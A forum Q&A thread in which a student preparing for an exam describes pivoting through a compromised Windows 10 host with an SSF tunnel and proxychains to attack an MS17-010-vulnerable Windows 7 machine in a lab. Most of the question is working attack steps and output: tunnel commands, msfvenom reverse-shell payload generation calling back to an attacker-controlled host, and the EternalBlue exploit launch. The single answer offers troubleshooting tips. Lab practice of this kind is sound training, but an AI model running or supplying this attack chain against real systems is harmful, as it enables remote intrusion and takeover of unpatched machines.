pivoting without metasploit to get reverse shell

Question

I have an exam next week. I need help.

This is my lab:

attacker machine (kali)         : 192.168.1.81
1st hacked machine (Windows 10) :  10.10.10.130 
target (Windows 7)              : 10.10.10.135 (have an MS17-010 exploit) 

Steps I follow: I hacked the Windows 10 machine I got a reverse shell via netcat on net then I upload into it (ssf) Secure Socket Funneling. I run this command on Windows 10 machine :

ssf.exe -g -F 22222 -L 10.10.10.130:3333:192.168.1.81:3333 -p 11111 192.168.1.81

then I run this command in my kali machine:

./ssfd -p 11111

I add this line to etc/proxychains4.conf:

socks4 127.0.0.1 22222

I got a reply from ssf client (Windows 10) to kali (ssfd server)

[2021-02-18T17:03:39-05:00] [info] [config] [tls] CA cert path: <file: ./certs/trusted/ca.crt>
[2021-02-18T17:03:39-05:00] [info] [config] [tls] cert path: <file: ./certs/certificate.crt>
[2021-02-18T17:03:39-05:00] [info] [config] [tls] key path: <file: ./certs/private.key>
[2021-02-18T17:03:39-05:00] [info] [config] [tls] key password: <>
[2021-02-18T17:03:39-05:00] [info] [config] [tls] dh path: <file: ./certs/dh4096.pem>
[2021-02-18T17:03:39-05:00] [info] [config] [tls] cipher suite: <DHE-RSA-AES256-GCM-SHA384>
[2021-02-18T17:03:39-05:00] [info] [config] [http proxy] <None>
[2021-02-18T17:03:39-05:00] [info] [config] [socks proxy] <None>
[2021-02-18T17:03:39-05:00] [info] [config] [circuit] <None>
[2021-02-18T17:03:39-05:00] [info] [ssfd] listening on <*:11111>
[2021-02-18T17:03:39-05:00] [info] [ssfd] running (Ctrl + C to stop)
[2021-02-18T17:09:49-05:00] [info] [microservice] [stream_listener]: forward TCP connections from <127.0.0.1:22222> to 22222
[2021-02-18T17:09:49-05:00] [info] [microservice] [stream_forwarder]: start forwarding stream fiber from fiber port 3333 to 192.168.1.81:3333

I tested nmap with a proxychains I scanned the ip: 10.10.10.135. And it works okay:

[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-18 17:31 EST
[proxychains] Strict chain  ...  127.0.0.1:22222  ...  10.10.10.135:80 <--denied
[proxychains] Strict chain  ...  127.0.0.1:22222  ...  10.10.10.135:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:22222  ...  10.10.10.135:445  ...  OK
Nmap scan report for 10.10.10.135
Host is up (1.9s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Nmap done: 1 IP address (1 host up) scanned in 3.94 seconds

Now I need to exploit it without metasploit. I download AutoBlue-MS17-010 from git hun and generate my shellcode:

Eternal Blue Windows Shellcode Compiler

Let's compile them windoos shellcodezzz

Compiling x64 kernel shellcode
Compiling x86 kernel shellcode
kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)
y
LHOST for reverse connection:
10.10.10.130
LPORT you want x64 to listen on:
3333
LPORT you want x86 to listen on:
3333
Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell
1
Type 0 to generate a staged payload or 1 to generate a stageless payload
1
Generating x64 cmd shell (stageless)...

msfvenom -p windows/x64/shell_reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=10.10.10.130 LPORT=3333
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Saved as: sc_x64_msf.bin

Generating x86 cmd shell (stageless)...

msfvenom -p windows/shell_reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=10.10.10.130 LPORT=3333
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Saved as: sc_x86_msf.bin

MERGING SHELLCODE WOOOO!!!
DONE

then I send it via :

proxychains4 python ../eternalblue_exploit7.py 10.10.10.135 sc_x64_msf.bin

And I did not get a reverse shell (Which is what I need help with)

Answer 1

So just to be clear the network set up is this?

192.168.1.81 <---> 10.10.10.130 <---> 10.10.10.135

and then you're trying to catch the shell from 10.10.10.135 by forwarding 10.10.10.130:3333 to 192.168.1.81:3333 directly?

or, since you mentioned a third machine in your post is 192.168.1.50 involved in the pivoting process at some point?

A) Do you have a listener set up on 192.168.1.81:3333? It's not clear from your post whether or not you do. It looks like you're just sending the payload and not trying to catch the shell

B) Sometimes Nmap sends back false positives, it could be that the SMB service is not actually vulnerable to EternalBlue. Also looks like you're sending the x64 payload, are you positive your target machine is x64? Try sending the x86 payload